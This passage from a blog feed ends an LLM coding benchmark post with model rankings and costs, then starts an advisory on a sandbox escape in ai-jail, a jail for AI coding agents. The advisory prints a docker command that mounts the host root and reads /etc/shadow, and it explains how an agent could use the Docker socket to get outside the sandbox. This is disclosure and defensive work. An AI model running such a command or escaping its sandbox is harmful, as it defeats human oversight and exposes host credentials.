          <td>OpenCode</td>
          <td style="text-align: right">75 min</td>
          <td style="text-align: right">$7.63</td>
      </tr>
      <tr>
          <td style="text-align: right">28</td>
          <td>MiMo V2.5 Pro</td>
          <td style="text-align: right"><strong>73</strong></td>
          <td style="text-align: center">B</td>
          <td>OpenCode</td>
          <td style="text-align: right">23 min</td>
          <td style="text-align: right">$0.22</td>
      </tr>
      <tr>
          <td style="text-align: right">29</td>
          <td>Grok 4.3</td>
          <td style="text-align: right"><strong>55</strong></td>
          <td style="text-align: center">C</td>
          <td>grok CLI</td>
          <td style="text-align: right">6 min</td>
          <td style="text-align: right">$0 (≈$0.18)</td>
      </tr>
      <tr>
          <td style="text-align: right">30</td>
          <td>Qwen3.7 Max</td>
          <td style="text-align: right"><strong>51</strong></td>
          <td style="text-align: center">C</td>
          <td>OpenCode</td>
          <td style="text-align: right">41 min</td>
          <td style="text-align: right">$2.59</td>
      </tr>
      <tr>
          <td style="text-align: right">31</td>
          <td>Step 3.5 Flash</td>
          <td style="text-align: right"><strong>27</strong></td>
          <td style="text-align: center">D</td>
          <td>OpenCode</td>
          <td style="text-align: right">47 min</td>
          <td style="text-align: right">$0.92</td>
      </tr>
  </tbody>
</table>
<p><em>Time is end-to-end wall clock across the three phases. Cost is API-equivalent: for models on Codex I use the cache-discounted blended figure (same criterion as the cost section below); on subscription plans (Z.ai, grok CLI) the marginal cost is $0 and the number in parentheses is the API-equivalent; the Antigravity runs were preview and were not metered.</em></p>
<p>The details, artifacts, and deductions are in the <a href="https://github.com/akitaonrails/llm-coding-benchmark/blob/master/docs/success_report.v2.md"target="_blank" rel="noopener">full v2 report</a>.</p>
<h2>What the tiers mean now<span class="hx:absolute hx:-mt-20" id="what-the-tiers-mean-now"></span>
    <a href="#what-the-tiers-mean-now" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The new cutoff is anchored on Claude Opus 4.6, which scored 83 and showed the minimum needed to carry the entire test. Here&rsquo;s the practical interpretation:</p>
<table>
  <thead>
      <tr>
          <th style="text-align: center">Tier</th>
          <th style="text-align: right">Score</th>
          <th>How I read it</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: center"><strong>A.1</strong></td>
          <td style="text-align: right"><strong>90 or higher</strong></td>
          <td>The frontier of this test. More complete and consistent delivery; differences of one or two points inside the group remain noise.</td>
      </tr>
      <tr>
          <td style="text-align: center"><strong>A.2</strong></td>
          <td style="text-align: right"><strong>83 to 89</strong></td>
          <td>Suitable for programming and past the same competence floor, but with more visible fixes or limitations. I still recommend these models, with closer review.</td>
      </tr>
      <tr>
          <td style="text-align: center"><strong>B</strong></td>
          <td style="text-align: right"><strong>73 to 82</strong></td>
          <td>Close, but it still needs human cleanup in an important area. I do not recommend it for autonomous work; I keep it on the radar.</td>
      </tr>
      <tr>
          <td style="text-align: center"><strong>C</strong></td>
          <td style="text-align: right"><strong>51 to 72</strong></td>
          <td>I do not recommend it for programming. It may still work for translation, summarization, classification, and simple agents.</td>
      </tr>
      <tr>
          <td style="text-align: center"><strong>D</strong></td>
          <td style="text-align: right"><strong>50 or lower</strong></td>
          <td>Inconsistent, broken, or difficult-to-predict behavior. I do not feel safe recommending it even for simple automation.</td>
      </tr>
  </tbody>
</table>
<p>There are <strong>15 models in A.1</strong> and <strong>9 in A.2</strong>. All 24 cleared the competence floor for this kind of work. The subdivision helps decide where to start: A.1 contains the frontier results; A.2 contains capable models that needed more fixes, left shallower tests, or carried clearer operational limitations.</p>
<p>That does not make 96 universally more intelligent than 91, nor does it make an A.2 model bad. An A.2 model may be better at refactoring, debugging, frontend work, or inside your fifteen-year-old monolith. This test does not measure all of that. The cutoff simply avoids throwing 24 options into one oversized bucket.</p>
<p>A.1 and A.2 make up the candidate pool. I cut Tier C and D before I start.</p>
<h2>So which one is best: Fable, Opus, Terra, or Kimi?<span class="hx:absolute hx:-mt-20" id="so-which-one-is-best-fable-opus-terra-or-kimi"></span>
    <a href="#so-which-one-is-best-fable-opus-terra-or-kimi" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If all you want is a one-line answer, you&rsquo;re going to be disappointed again.</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">API equivalent</th>
          <th>Practical use</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Claude Fable 5</td>
          <td style="text-align: right">96</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$26.03</td>
          <td>Claude Max subscription</td>
      </tr>
      <tr>
          <td>Claude Opus 5</td>
          <td style="text-align: right">95</td>
          <td style="text-align: right">78 min</td>
          <td style="text-align: right">$38.91</td>
          <td>Claude Max subscription</td>
      </tr>
      <tr>
          <td>Kimi K3</td>
          <td style="text-align: right">95</td>
          <td style="text-align: right">65 min</td>
          <td style="text-align: right">$6.14</td>
          <td>Moderato subscription</td>
      </tr>
      <tr>
          <td>GPT 5.6 Terra</td>
          <td style="text-align: right">93</td>
          <td style="text-align: right">49 min</td>
          <td style="text-align: right">$16.92 blended</td>
          <td>ChatGPT credits</td>
      </tr>
  </tbody>
</table>
<p>On the final artifact, <strong>Fable won</strong>. It was also the fastest of these four. If I were paying for every API call in this run, <strong>Kimi K3 won on cost by a mile</strong>, tying Opus at 95 and landing only one point behind Fable.</p>
<p>Opus 5 built an excellent project, but it was the slowest and burned 56.8 million tokens as counted by Claude Code. In this test, the extra 33 minutes over Fable bought nothing visible. Terra also delivered good work, finished two points behind K3, and cost less than Fable and Opus at API-equivalent rates.</p>
<p>If you already pay for Claude Max or ChatGPT Pro, the marginal cost stays near zero while you remain within the limits. Kimi Moderato is also a subscription, with its own quota windows. So &ldquo;$26 versus $6&rdquo; does not settle anything by itself. The first question is which subscription you already pay for and how much room it has left. For pay-as-you-go and automation, per-run cost moves back to center stage.</p>
<p>My reading of this run:</p>
<ul>
<li><strong>Fable 5</strong> delivered the best combination of quality and time;</li>
<li><strong>Kimi K3</strong> offered the best value among the leaders;</li>
<li><strong>Opus 5</strong> was capable and meticulous, but expensive and slow in this execution;</li>
<li><strong>GPT 5.6 Terra</strong> delivered the best balance in the family if you live in Codex.</li>
</ul>
<p>That&rsquo;s a reading of this project. Change the workload and the order may flip.</p>
<h2>Opus versus Sonnet, Sol versus Terra<span class="hx:absolute hx:-mt-20" id="opus-versus-sonnet-sol-versus-terra"></span>
    <a href="#opus-versus-sonnet-sol-versus-terra" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>A tier name is not a benchmark. Sonnet 5 proved that in an almost embarrassing way:</p>
<table>
  <thead>
      <tr>
          <th>Claude</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Recorded cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Fable 5</td>
          <td style="text-align: right">96</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$26.03 API equivalent</td>
      </tr>
      <tr>
          <td>Opus 5</td>
          <td style="text-align: right">95</td>
          <td style="text-align: right">78 min</td>
          <td style="text-align: right">$38.91 API equivalent</td>
      </tr>
      <tr>
          <td>Sonnet 5</td>
          <td style="text-align: right">95</td>
          <td style="text-align: right">59 min</td>
          <td style="text-align: right">$25.83 subscription equivalent</td>
      </tr>
      <tr>
          <td>Opus 4.8</td>
          <td style="text-align: right">93</td>
          <td style="text-align: right">53 min</td>
          <td style="text-align: right">$21.82 subscription equivalent</td>
      </tr>
  </tbody>
</table>
<p>Sonnet 5 tied Opus 5, finished nineteen minutes earlier, and produced the first genuine 100% line coverage in the entire benchmark. It also wrote the family&rsquo;s best self-review. Automatically choosing Opus because &ldquo;Opus is the higher tier&rdquo; would mean throwing out your own data.</p>
<p>This also corrects a terrible impression from v1, where Sonnet 5 scored 58 and hallucinated the RubyLLM API. In v2 it ran through Claude Code, received explicit requirements, and scored 95. We cannot conclude that the model improved by 37 points because we changed practically the entire experiment. We can conclude that the v1 pairing was a poor representation of what it can do.</p>
<p>On the OpenAI side:</p>
<table>
  <thead>
      <tr>
          <th>GPT</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Blended equivalent cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>GPT 5.6 Sol</td>
          <td style="text-align: right">93</td>
          <td style="text-align: right">57 min</td>
          <td style="text-align: right">~$45</td>
      </tr>
      <tr>
          <td>GPT 5.6 Terra</td>
          <td style="text-align: right">93</td>
          <td style="text-align: right">49 min</td>
          <td style="text-align: right">$16.92</td>
      </tr>
      <tr>
          <td>GPT 5.6 Luna</td>
          <td style="text-align: right">91</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$16.79</td>
      </tr>
      <tr>
          <td>GPT 5.5</td>
          <td style="text-align: right">88</td>
          <td style="text-align: right">58 min</td>
          <td style="text-align: right">~$53</td>
      </tr>
      <tr>
          <td>GPT 5.4</td>
          <td style="text-align: right">86</td>
          <td style="text-align: right">67 min</td>
          <td style="text-align: right">~$26</td>
      </tr>
  </tbody>
</table>
<p>Terra tied Sol at 93, finished eight minutes sooner, and cost a little more than one-third as much in the blended calculation. It also produced the best concurrency protection in the entire run: Redis with <code>WATCH</code>/<code>MULTI</code>, a distributed per-conversation lock, and forced tool choice. On this test, paying for Sol bought no points and saved no time. Terra is the most rational pick in the family.</p>
<p>Luna stays in the table because it scored 91 and remains an A.1 result, but its cost argument is gone: Terra scored two points higher for only thirteen cents more and took about three extra minutes.</p>
<p>Cache remains the important detail. Of Terra&rsquo;s 21.7 million input tokens, 21 million were cache hits. Pricing everything as fresh input would produce an upper bound of $111.62. At the cache rate, it falls to $16.92. Any cost table that mixes CLIs without understanding what each one reports is comparing apples to JSON.</p>
<h2>What about the Chinese models?<span class="hx:absolute hx:-mt-20" id="what-about-the-chinese-models"></span>
    <a href="#what-about-the-chinese-models" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The line about Chinese models being useful only as cheaper alternatives is stale.</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: center">Tier</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Reported cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Kimi K3</td>
          <td style="text-align: right">95</td>
          <td style="text-align: center">A.1</td>
          <td style="text-align: right">65 min</td>
          <td style="text-align: right">$6.14 equivalent, subscription</td>
      </tr>
      <tr>
          <td>Kimi K2.5</td>
          <td style="text-align: right">92</td>
          <td style="text-align: center">A.1</td>
          <td style="text-align: right">43 min</td>
          <td style="text-align: right">$1.50, API</td>
      </tr>
      <tr>
          <td>Kimi K2.6</td>
          <td style="text-align: right">91</td>
          <td style="text-align: center">A.1</td>
          <td style="text-align: right">34 min</td>
          <td style="text-align: right">$2.64, API</td>
      </tr>
      <tr>
          <td>Kimi K2.7-Coding</td>
          <td style="text-align: right">86</td>
          <td style="text-align: center">A.2</td>
          <td style="text-align: right">54 min</td>
          <td style="text-align: right">$4.37 equivalent, subscription</td>
      </tr>
      <tr>
          <td>MiniMax M3</td>
          <td style="text-align: right">91</td>
          <td style="text-align: center">A.1</td>
          <td style="text-align: right">113 min</td>
          <td style="text-align: right">$7.72, API</td>
      </tr>
      <tr>
          <td>GLM 5.2</td>
          <td style="text-align: right">92</td>
          <td style="text-align: center">A.1</td>
          <td style="text-align: right">155 min</td>
          <td style="text-align: right">$0 marginal on the subscription, $12.05 API equivalent</td>
      </tr>
      <tr>
          <td>DeepSeek V4 Pro</td>
          <td style="text-align: right">82</td>
          <td style="text-align: center">B</td>
          <td style="text-align: right">57 min</td>
          <td style="text-align: right">$0.35, API</td>
      </tr>
      <tr>
          <td>DeepSeek V4 Flash</td>
          <td style="text-align: right">80</td>
          <td style="text-align: center">B</td>
          <td style="text-align: right">36 min</td>
          <td style="text-align: right">$0.81, API</td>
      </tr>
  </tbody>
</table>
<p>Kimi K3 tied Opus 5. K2.5, K2.6, MiniMax M3, and GLM 5.2 landed in the same A.1 as Claude and GPT. The OpenCode runs are still cheaper than the $16 to $45 range of the leaders run through Claude Code and Codex, but this is no longer a comparison between pennies and dozens of dollars. And a subscription is not an API: GLM had zero marginal cost because it ran on Z.ai&rsquo;s plan; the same usage would cost about $12.05 through the API.</p>
<p>Kimi is the easiest family to recommend today. K3 offers top-tier quality through a cheap subscription. K2.5 and K2.6 were economical over the API, costing $1.50 and $2.64. K2.7 landed below its siblings, but it ran in another harness, so I am not going to invent a tidy progression story from four isolated data points.</p>
<p>MiniMax M3 deserves attention and caution in equal measure. It scored 91 for $7.72, still less than one run through the American leaders, but burned 121 million tokens and took almost two hours. It was the most expensive and token-hungry OpenCode run. The score is good; the usage profile, not so much.</p>
<p>GLM 5.2 scored 92 at zero marginal cost on Z.ai&rsquo;s plan, but consumed the equivalent of $12.05 through the API. It took about two and a half hours. If wall-clock time does not matter, it is a very strong option. If you work in short cycles, Grok 4.5 delivered 91 in about 25 minutes through grok CLI, more than six times faster.</p>
<p>DeepSeek remains cheap, but stopped in Tier B. V4 Pro scored 82 for $0.35 and V4 Flash scored 80 for $0.81. They&rsquo;re close, and I want to repeat the test when a new version arrives. Today I still would not leave either one working alone as a coding agent in a codebase that matters. Saving one or two dollars only to spend an hour reviewing a structural defect is lousy math.</p>
<h2>Why I did not rerun the local models<span class="hx:absolute hx:-mt-20" id="why-i-did-not-rerun-the-local-models"></span>
    <a href="#why-i-did-not-rerun-the-local-models" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I did not run Qwen 3.5 or the other local models on v2. The priority shifted to mapping the programming Tier A more accurately, and every complete run of this test costs machine time, audit time, and sanity.</p>
<p>Local models are not useless. They work for translation, classification, summarization, controlled one-shots, and tasks where privacy or offline operation matters more than quality. For autonomous coding agents, though, the v1 tests landed far below the floor. V2 is harder. I see no reason to spend several more days confirming that a quantized local Qwen cannot compete with Fable, Opus, GPT 5.6, or Kimi in software engineering.</p>
<p>For programming, it is not worth it today. If a new local model appears with strong evidence behind it, I&rsquo;ll test it. Until then, I&rsquo;d rather spend my time separating the twenty-four models that have already cleared the floor.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>V1 did its job and saturated. V2 puts pressure where today&rsquo;s models still slip: real streaming, multi-turn payloads, concurrency, persistence, tools, structured output, budgeting, operational security, faithful tests, and the ability to admit their own defects.</p>
<p>Fable 5 finished on top with 96. Sonnet 5, Opus 5, and Kimi K3 tied at 95. Sol and Terra came right behind them at 93. That answers which models produced the best projects on this test.</p>
<p>Choosing what to use is a different reading:</p>
<ul>
<li>Tier A.1 contains the 15 frontier results, all scoring 90 or higher;</li>
<li>Tier A.2 contains 9 capable models from 83 to 89, still worth recommending with closer review;</li>
<li>Tier B is close, but I still do not recommend it for autonomous work;</li>
<li>Tier C is for translation, summarization, and simple agents;</li>
<li>Tier D is too inconsistent for me to recommend;</li>
<li>inside Tier A, choose by subscription, speed, cost, and harness;</li>
<li>one or two points do not make anyone the universal champion of intelligence.</li>
</ul>
<p>My own choice remains concentrated on Claude Code and Codex because those are the harnesses I use every day. Within Codex, Terra delivered the best balance of score, time, and cost. Kimi K3 has become a serious top-tier alternative. Grok 4.5 is the speed champion of this round. GLM has zero marginal cost on the subscription and MiniMax still costs less than the leaders, but neither is a speed pick. Sonnet 5 proved that reflexively paying for or selecting the &ldquo;higher&rdquo; tier can be a waste.</p>
<p>All generated code, prompts, results, self-reviews, rubric details, and corrections are in <a href="https://github.com/akitaonrails/llm-coding-benchmark"target="_blank" rel="noopener">llm-coding-benchmark</a>. The major code and test overhaul is already on <code>master</code>. Contributions are welcome, whether you want to add a model, improve a harness, dispute a deduction, or find another bug in the auditor.</p>
<p>Just bring artifacts and data. We have enough ranking opinions already.</p>
]]></content:encoded><category>llm-benchmarks</category><category>llms</category><category>coding-agents</category></item><item><title>AI-Jail: Security Update, Docker Goes Opt-In</title><link>https://www.akitaonrails.com/en/2026/07/25/ai-jail-security-update-docker-opt-in/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/07/25/ai-jail-security-update-docker-opt-in/</guid><pubDate>Sat, 25 Jul 2026 13:00:00 GMT</pubDate><description>&lt;p&gt;Someone opened an important issue on the &lt;a href="https://github.com/akitaonrails/ai-jail"target="_blank" rel="noopener"&gt;ai-jail&lt;/a&gt; repo this morning: &lt;a href="https://github.com/akitaonrails/ai-jail/issues/88"target="_blank" rel="noopener"&gt;issue #88&lt;/a&gt;, reported by &lt;a href="https://github.com/mdindoffer"target="_blank" rel="noopener"&gt;@mdindoffer&lt;/a&gt;, titled &amp;ldquo;Sandbox escape via a docker socket passthrough (effective host root)&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;The report checked out, and the fix is already available in &lt;strong&gt;v1.16.0&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;Update to v1.16.0&lt;span class="hx:absolute hx:-mt-20" id="update-to-v1160"&gt;&lt;/span&gt;
&lt;a href="#update-to-v1160" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;If you use ai-jail, the update is the usual drill:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# Arch Linux (AUR)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;yay -Syu ai-jail-bin
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# Homebrew (macOS / Linux)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;brew update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; brew upgrade ai-jail
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# crates.io&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;cargo install ai-jail --force
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# mise&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mise cache clear &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; mise upgrade github:akitaonrails/ai-jail&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;What changed in v1.16.0&lt;span class="hx:absolute hx:-mt-20" id="what-changed-in-v1160"&gt;&lt;/span&gt;
&lt;a href="#what-changed-in-v1160" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Up through v1.15.x, ai-jail mounted the Docker socket inside the jail automatically whenever &lt;code&gt;/var/run/docker.sock&lt;/code&gt; existed on the host. Read-write. No warning, no flag, no asking for your opinion. I documented this in the README as &amp;ldquo;favors usability,&amp;rdquo; and it was true: a coding agent often needs to run &lt;code&gt;docker compose&lt;/code&gt; to bring up a test database, and the automatic passthrough saved some configuration.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Someone opened an important issue on the <a href="https://github.com/akitaonrails/ai-jail"target="_blank" rel="noopener">ai-jail</a> repo this morning: <a href="https://github.com/akitaonrails/ai-jail/issues/88"target="_blank" rel="noopener">issue #88</a>, reported by <a href="https://github.com/mdindoffer"target="_blank" rel="noopener">@mdindoffer</a>, titled &ldquo;Sandbox escape via a docker socket passthrough (effective host root)&rdquo;.</p>
<p>The report checked out, and the fix is already available in <strong>v1.16.0</strong>.</p>
<h2>Update to v1.16.0<span class="hx:absolute hx:-mt-20" id="update-to-v1160"></span>
    <a href="#update-to-v1160" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If you use ai-jail, the update is the usual drill:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Arch Linux (AUR)</span>
</span></span><span class="line"><span class="cl">yay -Syu ai-jail-bin
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Homebrew (macOS / Linux)</span>
</span></span><span class="line"><span class="cl">brew update <span class="o">&amp;&amp;</span> brew upgrade ai-jail
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># crates.io</span>
</span></span><span class="line"><span class="cl">cargo install ai-jail --force
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># mise</span>
</span></span><span class="line"><span class="cl">mise cache clear <span class="o">&amp;&amp;</span> mise upgrade github:akitaonrails/ai-jail</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<h2>What changed in v1.16.0<span class="hx:absolute hx:-mt-20" id="what-changed-in-v1160"></span>
    <a href="#what-changed-in-v1160" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Up through v1.15.x, ai-jail mounted the Docker socket inside the jail automatically whenever <code>/var/run/docker.sock</code> existed on the host. Read-write. No warning, no flag, no asking for your opinion. I documented this in the README as &ldquo;favors usability,&rdquo; and it was true: a coding agent often needs to run <code>docker compose</code> to bring up a test database, and the automatic passthrough saved some configuration.</p>
<p>Starting with v1.16.0, the behavior flipped:</p>
<ul>
<li>Socket passthrough is now <strong>off by default</strong>. It only goes in if you explicitly ask for it with the <code>--docker</code> flag or <code>no_docker = false</code> in <code>.ai-jail</code>.</li>
<li>When you enable it and a host socket exists, ai-jail prints a launch warning spelling out that this amounts to giving host root to the process inside the jail.</li>
<li><code>ai-jail status</code> now shows Docker as <code>disabled (default)</code>, so nobody thinks it got turned on by accident.</li>
<li>In <code>--lockdown</code> and browser profile modes the socket never goes in, same as before.</li>
</ul>
<p>A behavior change, yes, and a deliberate one. If your workflow depends on Docker inside the jail (mine does, in a few projects), opting in is one line in the project&rsquo;s <code>.ai-jail</code>:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-toml" data-lang="toml"><span class="line"><span class="cl"><span class="nx">no_docker</span> <span class="p">=</span> <span class="kc">false</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The field name is ugly (<code>no_docker = false</code> to turn it on, I know), but old configs keep parsing the same way, and <code>--no-docker</code> / <code>no_docker = true</code> work as before. Only the default changed. The details are in the <a href="https://github.com/akitaonrails/ai-jail/blob/master/releases/v1.16.0.md"target="_blank" rel="noopener">v1.16.0 release notes</a>.</p>
<h2>What issue #88 showed<span class="hx:absolute hx:-mt-20" id="what-issue-88-showed"></span>
    <a href="#what-issue-88-showed" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>mdindoffer&rsquo;s report is the kind every maintainer wants to get: precise summary, a repro in a few lines, a fix proposal. The gist:</p>
<p>ai-jail was mounting the <strong>raw</strong> Docker socket inside the sandbox, read-write. The Docker daemon runs as root on the host. So an agent inside the jail could run this:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker run --rm -v /:/host alpine sh -c <span class="s1">&#39;cat /host/etc/shadow&#39;</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>And that&rsquo;s the ballgame. Read any file on the host, as root. It defeats the tmpfs <code>$HOME</code>, <code>--mask</code>, <code>--deny-path</code>, and Landlock in one move, because the action no longer happens inside the sandbox: it happens in the daemon, which lives outside and above any namespace bwrap created. The agent doesn&rsquo;t even need to escape the jail when the jail has a door straight into the engine room.</p>
<p>In retrospect, shipping this on by default was a design mistake. I knew the passthrough was &ldquo;dangerous&rdquo; in the abstract, and I wrote as much in the README. What I hadn&rsquo;t internalized: dangerous like this, with this default, is a vulnerability.</p>
<p>mdindoffer also proposed the definitive hardening path: instead of mounting the raw socket, put a filtered proxy in front of it (in the style of <a href="https://github.com/wollomatic/socket-proxy"target="_blank" rel="noopener">wollomatic/socket-proxy</a>) that only accepts bind mounts from paths the agent can already write to inside the jail. It&rsquo;s on the radar for a future release. To close the hole now, opt-in with an explicit warning fixes the default, which is where the problem lived.</p>
<h2>The vulnerability class: docker.sock is root<span class="hx:absolute hx:-mt-20" id="the-vulnerability-class-dockersock-is-root"></span>
    <a href="#the-vulnerability-class-dockersock-is-root" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>This is not the first time I&rsquo;ve run into this story, and I&rsquo;d bet it isn&rsquo;t yours either. &ldquo;Whoever has access to the Docker socket has root on the host&rdquo; is one of the classics of container security, documented by Docker itself on the <a href="https://docs.docker.com/engine/security/"target="_blank" rel="noopener">daemon attack surface</a> page: only trusted users should control the daemon, because Docker lets you share any host directory with a container, with no access restriction whatsoever.</p>
<p>The technical reason is simple. <code>dockerd</code> is a daemon that runs as root and obeys commands arriving through the API on the <code>/var/run/docker.sock</code> Unix socket. The <code>docker</code> CLI is just a client of that API. When you ask for <code>docker run -v /:/host</code>, the daemon is the one creating the container and mounting the host&rsquo;s entire filesystem inside it, with full privilege. And a process inside a container runs as uid 0 by default, which the kernel sees as real uid 0 (barring user namespace remapping, which almost nobody turns on). The math checks out: write access to the socket equals root on the host. The <code>docker</code> group is passwordless sudo by another name.</p>
<h2>The demo, on your machine<span class="hx:absolute hx:-mt-20" id="the-demo-on-your-machine"></span>
    <a href="#the-demo-on-your-machine" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If you have Docker installed and your user in the <code>docker</code> group, reproduce it right now. No sudo, no exploiting any bug:</p>
